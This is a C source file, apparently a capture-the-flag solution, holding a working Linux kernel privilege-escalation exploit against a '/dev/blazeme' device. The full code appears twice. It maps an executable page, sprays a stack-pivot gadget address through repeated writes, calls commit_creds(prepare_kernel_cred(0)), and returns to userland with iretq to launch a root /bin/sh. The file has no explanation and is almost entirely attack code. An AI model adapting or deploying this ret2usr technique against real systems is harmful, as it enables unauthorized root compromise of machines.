fatalbit/blazeme_exp.c

## blazeme_exp.c
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>

int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred) = 0xffffffff81063960;
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred) = 0xffffffff81063b50;
void trap_return();

void escalate_privs() {
  commit_creds(prepare_kernel_cred(0));
  trap_return();
}

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long saved_sp;
void shell();

void save_segments() {
  asm volatile(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "pushfq\n"
      "popq %2\n"
      "pushq %%rsp\n"
      "popq %3\n"
      : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(saved_sp)
      :
      : "memory");
}

void trap_return() {
  asm volatile(
      "swapgs ;"
      "movq %0, 0x20(%%rsp)\t\n"
      "movq %1, 0x18(%%rsp)\t\n"
      "movq %2, 0x10(%%rsp)\t\n"
      "movq %3, 0x08(%%rsp)\t\n"
      "movq %4, 0x00(%%rsp)\t\n"
      "iretq"
      :
      : "r"(user_ss), "r"(saved_sp), "r"(user_rflags), "r"(user_cs), "r"(shell));
}

void shell() {
  printf("Starting shell\n");
  system("/bin/sh");
}

int main() {
  int fd;
  fd = open("/dev/blazeme", O_RDWR);
  if (fd < 0) {
    return -1;
  }

  const size_t BUF_SIZE = 64;
  uint8_t payload[BUF_SIZE];

  payload[0] = 0x42;
  payload[1] = 0x42;

  uint64_t* ptr = (uint64_t*)&payload[2];

  /* Align to pointer boundary with 'Hello ' prefix */
  size_t idx = 2;
  /* mmap a non alpha numeric memory addr*/

  const size_t MAP_SIZE = 0x2000;
  /* Map a page ahead to account for oopsing on sub esp instructions after the
   * pivot */
  void* addr = mmap((void*)0x173f000, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
      MAP_FIXED | MAP_ANON | MAP_PRIVATE , -1, 0);
  if (addr == MAP_FAILED) {
    printf("map failed\n");
    return -1;
  }

  for (size_t i = 0; i < (MAP_SIZE / sizeof(unsigned long)); ++i) {
    ((unsigned long*)addr)[i] = (unsigned long)&escalate_privs;
  }

  printf("Addr mapped is %p\n", addr);
  for (; idx < BUF_SIZE;) {
    *ptr = 0xffffffff8109c604;
    ptr++;
    idx += 8;
  }

  for (; idx < BUF_SIZE; ++idx) {
    payload[idx] = 0x41;
  }

  /* Stack buffer is 512 so we need to just keep sending
   * until our spray aligns. */
  printf("Saving segments\n");
  save_segments();
  printf("Sending payload, attempting to return to %p\n", &escalate_privs);
  for (size_t i = 0; i < 100; ++i) {
    write(fd, payload, sizeof(payload));
  }

}
	#include <unistd.h>
	#include <fcntl.h>
	#include <stdint.h>
	#include <stdlib.h>
	#include <stdio.h>
	#include <sys/mman.h>

	int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred) = 0xffffffff81063960;
	unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred) = 0xffffffff81063b50;
	void trap_return();

	void escalate_privs() {
	commit_creds(prepare_kernel_cred(0));
	trap_return();
	}

	unsigned long user_cs;
	unsigned long user_ss;
	unsigned long user_rflags;
	unsigned long saved_sp;
	void shell();

	void save_segments() {
	asm volatile(
	"movq %%cs, %0\n"
	"movq %%ss, %1\n"
	"pushfq\n"
	"popq %2\n"
	"pushq %%rsp\n"
	"popq %3\n"
	: "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(saved_sp)
	:
	: "memory");
	}

	void trap_return() {
	asm volatile(
	"swapgs ;"
	"movq %0, 0x20(%%rsp)\t\n"
	"movq %1, 0x18(%%rsp)\t\n"
	"movq %2, 0x10(%%rsp)\t\n"
	"movq %3, 0x08(%%rsp)\t\n"
	"movq %4, 0x00(%%rsp)\t\n"
	"iretq"
	:
	: "r"(user_ss), "r"(saved_sp), "r"(user_rflags), "r"(user_cs), "r"(shell));
	}

	void shell() {
	printf("Starting shell\n");
	system("/bin/sh");
	}

	int main() {
	int fd;
	fd = open("/dev/blazeme", O_RDWR);
	if (fd < 0) {
	return -1;
	}

	const size_t BUF_SIZE = 64;
	uint8_t payload[BUF_SIZE];

	payload[0] = 0x42;
	payload[1] = 0x42;

	uint64_t* ptr = (uint64_t*)&payload[2];

	/* Align to pointer boundary with 'Hello ' prefix */
	size_t idx = 2;
	/* mmap a non alpha numeric memory addr*/

	const size_t MAP_SIZE = 0x2000;
	/* Map a page ahead to account for oopsing on sub esp instructions after the
	* pivot */
	void* addr = mmap((void*)0x173f000, MAP_SIZE, PROT_READ \| PROT_WRITE \| PROT_EXEC,
	MAP_FIXED \| MAP_ANON \| MAP_PRIVATE , -1, 0);
	if (addr == MAP_FAILED) {
	printf("map failed\n");
	return -1;
	}

	for (size_t i = 0; i < (MAP_SIZE / sizeof(unsigned long)); ++i) {
	((unsigned long*)addr)[i] = (unsigned long)&escalate_privs;
	}

	printf("Addr mapped is %p\n", addr);
	for (; idx < BUF_SIZE;) {
	*ptr = 0xffffffff8109c604;
	ptr++;
	idx += 8;
	}

	for (; idx < BUF_SIZE; ++idx) {
	payload[idx] = 0x41;
	}

	/* Stack buffer is 512 so we need to just keep sending
	* until our spray aligns. */
	printf("Saving segments\n");
	save_segments();
	printf("Sending payload, attempting to return to %p\n", &escalate_privs);
	for (size_t i = 0; i < 100; ++i) {
	write(fd, payload, sizeof(payload));
	}

	}